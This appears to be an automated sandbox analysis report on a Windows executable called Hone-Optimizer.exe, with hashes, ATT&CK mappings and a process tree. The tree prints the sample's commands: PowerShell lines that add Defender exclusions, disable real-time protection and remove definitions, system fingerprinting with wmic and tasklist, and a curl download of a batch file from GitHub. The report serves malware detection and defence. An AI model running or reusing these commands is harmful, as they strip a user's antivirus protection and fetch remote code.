07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65

Resubmissions

16-10-2024 00:29

241016-asw7rstfng 10

15-10-2024 23:10

241015-25r75awdrq 10

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-10-2024 23:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hone-Optimizer.exe
Size

7.7MB
MD5

baa9792a0bb9c8df5521b14e425dbe09
SHA1

1cf257b5c2ac3c84d468a3a6a3dbc846f7d50d5e
SHA256

07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65
SHA512

45e7285cbbddb8ed61d4a39a09f15b032d8e39534139e96fe81f522fd9a644e2461080ff861062a35f3dec517a55bf584683b17dc2381c6f683f09ae06a4a636
SSDEEP

98304:8VeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTbdk+QqnWv9JTSPhlVX:8AYmOshoKMuIkhVastRL5Di3tKb0SPJX

Score

8^/10

discovery execution upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2164	powershell.exe
1000	powershell.exe
4832	powershell.exe
2500	powershell.exe
3256	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1644	bound.exe
4804	dismhost.exe

Loads dropped DLL 36 IoCs

pid	Process
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4644	Hone-Optimizer.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe
4804	dismhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
33	raw.githubusercontent.com
34	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
400	tasklist.exe

UPX packed file 48 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023cae-22.dat	upx
behavioral2/memory/4644-26-0x00007FFF97430000-0x00007FFF97A19000-memory.dmp	upx
behavioral2/files/0x0007000000023ca3-28.dat	upx
behavioral2/memory/4644-31-0x00007FFFA8CE0000-0x00007FFFA8D03000-memory.dmp	upx
behavioral2/memory/4644-33-0x00007FFFAE600000-0x00007FFFAE60F000-memory.dmp	upx
behavioral2/files/0x0007000000023cac-30.dat	upx
behavioral2/files/0x0007000000023ca6-39.dat	upx
behavioral2/memory/4644-41-0x00007FFFA8A80000-0x00007FFFA8AAD000-memory.dmp	upx
behavioral2/files/0x0007000000023ca2-42.dat	upx
behavioral2/memory/4644-44-0x00007FFFACAD0000-0x00007FFFACAE9000-memory.dmp	upx
behavioral2/files/0x0007000000023ca9-45.dat	upx
behavioral2/memory/4644-48-0x00007FFFA6A90000-0x00007FFFA6AB3000-memory.dmp	upx
behavioral2/files/0x0007000000023cb1-47.dat	upx
behavioral2/memory/4644-50-0x00007FFF96EC0000-0x00007FFF97037000-memory.dmp	upx
behavioral2/files/0x0007000000023ca8-51.dat	upx
behavioral2/memory/4644-53-0x00007FFFA66C0000-0x00007FFFA66D9000-memory.dmp	upx
behavioral2/files/0x0007000000023cb0-54.dat	upx
behavioral2/memory/4644-56-0x00007FFFA8A70000-0x00007FFFA8A7D000-memory.dmp	upx
behavioral2/files/0x0007000000023caa-57.dat	upx
behavioral2/files/0x0007000000023cab-59.dat	upx
behavioral2/memory/4644-60-0x00007FFFA6680000-0x00007FFFA66B3000-memory.dmp	upx
behavioral2/files/0x0007000000023cad-61.dat	upx
behavioral2/memory/4644-67-0x00007FFF966E0000-0x00007FFF96C00000-memory.dmp	upx
behavioral2/memory/4644-69-0x00007FFFA8CE0000-0x00007FFFA8D03000-memory.dmp	upx
behavioral2/memory/4644-66-0x00007FFF96C00000-0x00007FFF96CCD000-memory.dmp	upx
behavioral2/memory/4644-65-0x00007FFF97430000-0x00007FFF97A19000-memory.dmp	upx
behavioral2/files/0x0007000000023ca5-71.dat	upx
behavioral2/files/0x0007000000023ca7-74.dat	upx
behavioral2/memory/4644-77-0x00007FFFA75A0000-0x00007FFFA75AD000-memory.dmp	upx
behavioral2/files/0x0007000000023cb2-79.dat	upx
behavioral2/memory/4644-81-0x00007FFF965C0000-0x00007FFF966DC000-memory.dmp	upx
behavioral2/memory/4644-80-0x00007FFFACAD0000-0x00007FFFACAE9000-memory.dmp	upx
behavioral2/memory/4644-73-0x00007FFFA5F90000-0x00007FFFA5FA4000-memory.dmp	upx
behavioral2/memory/4644-127-0x00007FFF965C0000-0x00007FFF966DC000-memory.dmp	upx
behavioral2/memory/4644-132-0x00007FFFA6A90000-0x00007FFFA6AB3000-memory.dmp	upx
behavioral2/memory/4644-138-0x00007FFF966E0000-0x00007FFF96C00000-memory.dmp	upx
behavioral2/memory/4644-137-0x00007FFF96C00000-0x00007FFF96CCD000-memory.dmp	upx
behavioral2/memory/4644-136-0x00007FFFA6680000-0x00007FFFA66B3000-memory.dmp	upx
behavioral2/memory/4644-135-0x00007FFFA8A70000-0x00007FFFA8A7D000-memory.dmp	upx
behavioral2/memory/4644-134-0x00007FFFA66C0000-0x00007FFFA66D9000-memory.dmp	upx
behavioral2/memory/4644-133-0x00007FFF96EC0000-0x00007FFF97037000-memory.dmp	upx
behavioral2/memory/4644-131-0x00007FFFACAD0000-0x00007FFFACAE9000-memory.dmp	upx
behavioral2/memory/4644-130-0x00007FFFA8A80000-0x00007FFFA8AAD000-memory.dmp	upx
behavioral2/memory/4644-129-0x00007FFFAE600000-0x00007FFFAE60F000-memory.dmp	upx
behavioral2/memory/4644-128-0x00007FFFA8CE0000-0x00007FFFA8D03000-memory.dmp	upx
behavioral2/memory/4644-126-0x00007FFFA75A0000-0x00007FFFA75AD000-memory.dmp	upx
behavioral2/memory/4644-125-0x00007FFFA5F90000-0x00007FFFA5FA4000-memory.dmp	upx
behavioral2/memory/4644-113-0x00007FFF97430000-0x00007FFF97A19000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e3c1c56297b3270b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e3c1c5620000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e3c1c562000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de3c1c562000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e3c1c56200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1332	reg.exe
1032	reg.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2500	powershell.exe
2500	powershell.exe
3256	powershell.exe
3256	powershell.exe
4832	powershell.exe
4832	powershell.exe
4832	powershell.exe
2500	powershell.exe
3256	powershell.exe
2164	powershell.exe
2164	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1928	WMIC.exe
Token: SeSecurityPrivilege	1928	WMIC.exe
Token: SeTakeOwnershipPrivilege	1928	WMIC.exe
Token: SeLoadDriverPrivilege	1928	WMIC.exe
Token: SeSystemProfilePrivilege	1928	WMIC.exe
Token: SeSystemtimePrivilege	1928	WMIC.exe
Token: SeProfSingleProcessPrivilege	1928	WMIC.exe
Token: SeIncBasePriorityPrivilege	1928	WMIC.exe
Token: SeCreatePagefilePrivilege	1928	WMIC.exe
Token: SeBackupPrivilege	1928	WMIC.exe
Token: SeRestorePrivilege	1928	WMIC.exe
Token: SeShutdownPrivilege	1928	WMIC.exe
Token: SeDebugPrivilege	1928	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1928	WMIC.exe
Token: SeRemoteShutdownPrivilege	1928	WMIC.exe
Token: SeUndockPrivilege	1928	WMIC.exe
Token: SeManageVolumePrivilege	1928	WMIC.exe
Token: 33	1928	WMIC.exe
Token: 34	1928	WMIC.exe
Token: 35	1928	WMIC.exe
Token: 36	1928	WMIC.exe
Token: SeDebugPrivilege	400	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1928	WMIC.exe
Token: SeSecurityPrivilege	1928	WMIC.exe
Token: SeTakeOwnershipPrivilege	1928	WMIC.exe
Token: SeLoadDriverPrivilege	1928	WMIC.exe
Token: SeSystemProfilePrivilege	1928	WMIC.exe
Token: SeSystemtimePrivilege	1928	WMIC.exe
Token: SeProfSingleProcessPrivilege	1928	WMIC.exe
Token: SeIncBasePriorityPrivilege	1928	WMIC.exe
Token: SeCreatePagefilePrivilege	1928	WMIC.exe
Token: SeBackupPrivilege	1928	WMIC.exe
Token: SeRestorePrivilege	1928	WMIC.exe
Token: SeShutdownPrivilege	1928	WMIC.exe
Token: SeDebugPrivilege	1928	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1928	WMIC.exe
Token: SeRemoteShutdownPrivilege	1928	WMIC.exe
Token: SeUndockPrivilege	1928	WMIC.exe
Token: SeManageVolumePrivilege	1928	WMIC.exe
Token: 33	1928	WMIC.exe
Token: 34	1928	WMIC.exe
Token: 35	1928	WMIC.exe
Token: 36	1928	WMIC.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeBackupPrivilege	880	Dism.exe
Token: SeRestorePrivilege	880	Dism.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeBackupPrivilege	2728	vssvc.exe
Token: SeRestorePrivilege	2728	vssvc.exe
Token: SeAuditPrivilege	2728	vssvc.exe
Token: SeDebugPrivilege	1000	powershell.exe
Token: SeBackupPrivilege	448	srtasks.exe
Token: SeRestorePrivilege	448	srtasks.exe
Token: SeSecurityPrivilege	448	srtasks.exe
Token: SeTakeOwnershipPrivilege	448	srtasks.exe
Token: SeBackupPrivilege	448	srtasks.exe
Token: SeRestorePrivilege	448	srtasks.exe
Token: SeSecurityPrivilege	448	srtasks.exe
Token: SeTakeOwnershipPrivilege	448	srtasks.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4552 wrote to memory of 4644	4552	Hone-Optimizer.exe	84
PID 4552 wrote to memory of 4644	4552	Hone-Optimizer.exe	84
PID 4644 wrote to memory of 4548	4644	Hone-Optimizer.exe	88
PID 4644 wrote to memory of 4548	4644	Hone-Optimizer.exe	88
PID 4644 wrote to memory of 776	4644	Hone-Optimizer.exe	89
PID 4644 wrote to memory of 776	4644	Hone-Optimizer.exe	89
PID 4644 wrote to memory of 432	4644	Hone-Optimizer.exe	90
PID 4644 wrote to memory of 432	4644	Hone-Optimizer.exe	90
PID 4644 wrote to memory of 4108	4644	Hone-Optimizer.exe	91
PID 4644 wrote to memory of 4108	4644	Hone-Optimizer.exe	91
PID 4644 wrote to memory of 5076	4644	Hone-Optimizer.exe	96
PID 4644 wrote to memory of 5076	4644	Hone-Optimizer.exe	96
PID 4644 wrote to memory of 1028	4644	Hone-Optimizer.exe	98
PID 4644 wrote to memory of 1028	4644	Hone-Optimizer.exe	98
PID 1028 wrote to memory of 1928	1028	cmd.exe	100
PID 1028 wrote to memory of 1928	1028	cmd.exe	100
PID 5076 wrote to memory of 400	5076	cmd.exe	101
PID 5076 wrote to memory of 400	5076	cmd.exe	101
PID 776 wrote to memory of 4832	776	cmd.exe	102
PID 776 wrote to memory of 4832	776	cmd.exe	102
PID 4548 wrote to memory of 2500	4548	cmd.exe	103
PID 4548 wrote to memory of 2500	4548	cmd.exe	103
PID 432 wrote to memory of 3256	432	cmd.exe	104
PID 432 wrote to memory of 3256	432	cmd.exe	104
PID 4108 wrote to memory of 1644	4108	cmd.exe	107
PID 4108 wrote to memory of 1644	4108	cmd.exe	107
PID 1644 wrote to memory of 5032	1644	bound.exe	109
PID 1644 wrote to memory of 5032	1644	bound.exe	109
PID 5032 wrote to memory of 1456	5032	cmd.exe	110
PID 5032 wrote to memory of 1456	5032	cmd.exe	110
PID 5032 wrote to memory of 1332	5032	cmd.exe	111
PID 5032 wrote to memory of 1332	5032	cmd.exe	111
PID 5032 wrote to memory of 4480	5032	cmd.exe	112
PID 5032 wrote to memory of 4480	5032	cmd.exe	112
PID 5032 wrote to memory of 4464	5032	cmd.exe	113
PID 5032 wrote to memory of 4464	5032	cmd.exe	113
PID 5032 wrote to memory of 1032	5032	cmd.exe	114
PID 5032 wrote to memory of 1032	5032	cmd.exe	114
PID 5032 wrote to memory of 3692	5032	cmd.exe	115
PID 5032 wrote to memory of 3692	5032	cmd.exe	115
PID 5032 wrote to memory of 1492	5032	cmd.exe	121
PID 5032 wrote to memory of 1492	5032	cmd.exe	121
PID 5032 wrote to memory of 544	5032	cmd.exe	123
PID 5032 wrote to memory of 544	5032	cmd.exe	123
PID 5032 wrote to memory of 4180	5032	cmd.exe	124
PID 5032 wrote to memory of 4180	5032	cmd.exe	124
PID 5032 wrote to memory of 880	5032	cmd.exe	125
PID 5032 wrote to memory of 880	5032	cmd.exe	125
PID 880 wrote to memory of 4804	880	Dism.exe	126
PID 880 wrote to memory of 4804	880	Dism.exe	126
PID 5032 wrote to memory of 1660	5032	cmd.exe	128
PID 5032 wrote to memory of 1660	5032	cmd.exe	128
PID 5032 wrote to memory of 2164	5032	cmd.exe	129
PID 5032 wrote to memory of 2164	5032	cmd.exe	129
PID 5032 wrote to memory of 1000	5032	cmd.exe	133
PID 5032 wrote to memory of 1000	5032	cmd.exe	133
PID 5032 wrote to memory of 736	5032	cmd.exe	137
PID 5032 wrote to memory of 736	5032	cmd.exe	137
PID 5032 wrote to memory of 5116	5032	cmd.exe	138
PID 5032 wrote to memory of 5116	5032	cmd.exe	138
PID 5032 wrote to memory of 404	5032	cmd.exe	139
PID 5032 wrote to memory of 404	5032	cmd.exe	139
PID 5032 wrote to memory of 1036	5032	cmd.exe	140
PID 5032 wrote to memory of 1036	5032	cmd.exe	140

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4552
- C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
  "C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4108
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1644
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AB15.tmp\AB16.tmp\AB17.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5032
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:1456
      - C:\Windows\system32\reg.exe
        
        reg add HKLM /F
        6⤵
        Modifies registry key
        
        PID:1332
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:4480
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
        6⤵
        
        PID:4464
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
        6⤵
        Modifies registry key
        
        PID:1032
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "Disclaimer"
        6⤵
        
        PID:3692
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "Disclaimer"
        6⤵
        
        PID:1492
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Hone" /v "Disclaimer" /f
        6⤵
        
        PID:544
      - C:\Windows\system32\curl.exe
        
        curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"
        6⤵
        
        PID:4180
      - C:\Windows\system32\Dism.exe
        
        dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart
        6⤵
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\30B8B9B9-A476-4E2C-9A7E-02083C5147D5\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\30B8B9B9-A476-4E2C-9A7E-02083C5147D5\dismhost.exe {C3804566-CB5C-4E85-AE23-D9F22BE98FB1}
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:4804
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
        6⤵
        
        PID:1660
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1000
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c date /t
        6⤵
        
        PID:736
      - C:\Windows\system32\reg.exe
        
        reg export HKCU C:\Hone\HoneRevert\10.15.2024\HKLM.reg /y
        6⤵
        
        PID:5116
      - C:\Windows\system32\reg.exe
        
        reg export HKCU C:\Hone\HoneRevert\10.15.2024\HKCU.reg /y
        6⤵
        
        PID:404
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:1036
      - C:\Windows\System32\choice.exe
        
        C:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "
        6⤵
        
        PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5076
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1928

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2728

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Temp\30B8B9B9-A476-4E2C-9A7E-02083C5147D5\AppxProvider.dll

Filesize
554KB

MD5
a7927846f2bd5e6ab6159fbe762990b1

SHA1
8e3b40c0783cc88765bbc02ccc781960e4592f3f

SHA256
913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f

SHA512
1eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f

Download Submit
C:\Users\Admin\AppData\Local\Temp\30B8B9B9-A476-4E2C-9A7E-02083C5147D5\AssocProvider.dll

Filesize
112KB

MD5
94dc379aa020d365ea5a32c4fab7f6a3

SHA1
7270573fd7df3f3c996a772f85915e5982ad30a1

SHA256
dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907

SHA512
998fd10a1f43024a2398491e3764748c0b990b37d8b3c820d281296f8da8f1a2f97073f4fd83543994a6e326fa7e299cb5f59e609358cd77af996175782eeaca

Download Submit
C:\Users\Admin\AppData\Local\Temp\30B8B9B9-A476-4E2C-9A7E-02083C5147D5\CbsProvider.dll

Filesize
875KB

MD5
6ad0376a375e747e66f29fb7877da7d0

SHA1
a0de5966453ff2c899f00f165bbff50214b5ea39

SHA256
4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f

SHA512
8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\30B8B9B9-A476-4E2C-9A7E-02083C5147D5\DismCore.dll

Filesize
402KB

MD5
b1f793773dc727b4af1648d6d61f5602

SHA1
be7ed4e121c39989f2fb343558171ef8b5f7af68

SHA256
af7f342adf5b533ea6978b68064f39bfb1e4ad3b572ae1b7f2287f5533334d4e

SHA512
66a92bff5869a56a7931d7ed9881d79c22ba741c55fb42c11364f037e1ec99902db2679b67a7e60cbf760740d5b47dcf1a6dcfae5ad6711a0bd7f086cc054eed

Download Submit
C:\Users\Admin\AppData\Local\Temp\30B8B9B9-A476-4E2C-9A7E-02083C5147D5\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\30B8B9B9-A476-4E2C-9A7E-02083C5147D5\DismHost.exe

Filesize
142KB

MD5
e5d5e9c1f65b8ec7aa5b7f1b1acdd731

SHA1
dbb14dcda6502ab1d23a7c77d405dafbcbeb439e

SHA256
e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80

SHA512
7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\30B8B9B9-A476-4E2C-9A7E-02083C5147D5\LogProvider.dll

Filesize
77KB

MD5
815a4e7a7342224a239232f2c788d7c0

SHA1
